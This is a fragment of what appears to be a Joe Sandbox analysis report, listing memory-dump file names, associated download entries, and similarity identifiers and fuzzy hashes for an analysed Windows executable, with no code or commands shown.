                                    • Source File: 00000000.00000002.2238842993.00007FF7AA2B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AA2B0000, based on PE: true
                                    • Associated: 00000000.00000002.2238821171.00007FF7AA2B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239166745.00007FF7AA70D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239191433.00007FF7AA710000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239214091.00007FF7AA711000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239235845.00007FF7AA712000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239258240.00007FF7AA714000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2239280859.00007FF7AA716000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff7aa2b0000_runtime.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                    • String ID:
                                    • API String ID: 2933794660-0
                                    • Opcode ID: f9fdfbc2eddf83a327d75f5f4feb55eea0c204e0ea8e21ea42afd3d14022f489
                                    • Instruction ID: eab499315faab3d11be1f3b2a040399d00933bdd5884affecdcde6bcd32a3cd8
                                    • Opcode Fuzzy Hash: f9fdfbc2eddf83a327d75f5f4feb55eea0c204e0ea8e21ea42afd3d14022f489
                                    • Instruction Fuzzy Hash: 96116626B15B018AFB009F61E8542A873A0FB0A758F850E30EA2D427A8DF7CD0658360